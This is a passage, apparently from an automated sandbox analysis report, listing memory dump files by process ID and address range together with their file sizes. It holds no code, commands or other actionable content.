                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4204-212-0x0000000073920000-0x0000000073A9B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4764-124-0x000001CD71E60000-0x000001CD71E6A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4764-123-0x000001CD71EA0000-0x000001CD71EB2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4764-113-0x000001CD597E0000-0x000001CD59802000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4824-61-0x0000000000F60000-0x000000000140F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4824-89-0x0000000000F60000-0x000000000140F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4896-167-0x00000000009B0000-0x0000000000E5E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4896-159-0x00000000009B0000-0x0000000000E5E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5076-282-0x00007FFF5A250000-0x00007FFF5A445000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5204-376-0x00007FFF5A250000-0x00007FFF5A445000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5204-375-0x0000000073920000-0x0000000073A9B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5264-2725-0x0000000000BD0000-0x0000000000C48000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  480KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5328-133-0x00007FF7424F0000-0x00007FF7425CC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  880KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5536-161-0x0000000000400000-0x0000000000DC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5536-169-0x00007FFF37790000-0x00007FFF37902000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5536-171-0x00007FFF37790000-0x00007FFF37902000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5536-251-0x00007FFF37790000-0x00007FFF37902000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6104-1924-0x0000000000EF0000-0x0000000001390000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6104-2751-0x0000000000EF0000-0x0000000001390000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6104-2748-0x0000000000EF0000-0x0000000001390000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.6MB